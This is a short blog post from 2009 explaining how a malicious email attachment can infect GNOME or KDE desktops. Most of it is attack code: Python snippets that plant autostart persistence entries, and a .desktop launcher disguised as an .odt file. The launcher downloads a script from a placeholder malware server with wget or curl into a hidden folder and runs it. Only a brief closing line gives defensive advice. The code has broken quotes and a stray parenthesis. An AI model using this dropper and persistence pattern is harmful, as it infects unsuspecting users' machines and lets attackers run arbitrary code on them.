Insert Malware on GNOME or KDE as Attachment
February 12th, 2009
No comments
Insert Malware on GNOME or KDE as Attachment
The premise of this type of ‘Malware’ is simple:
Get a user to run an executable attachment you sent them via email.
KDE:
import os uname = os.getlogin() drop_dir = “/home/%s/.kde/Autostart” % uname) os.makedirs(drop_dir) os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")
GNOME:
import os relauncher_str = """ [Desktop Entry] Type=Application Name=Malware Exec=python .local/.hidden/s.py Icon=system-run """ uname = os.getlogin() drop_dir = “/home/%s/.config/autostart” % uname os.makedirs(drop_dir) f = open(drop_dir+”/Malware.desktop”, “w”) f.write(relauncher_str) f.close()
Launcher:
[Desktop Entry] Type=Application Name=some_text.odt Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP; if [ -e /usr/bin/wget ] ; then wget $URL -O $DROP/s.py ; else curl $URL -o $DROP/s.py ; fi; python $DROP/s.py' Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png
Solutions for the problem:
The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken serious.
More information on http://www.geekzone.co.nz/foobar/6229
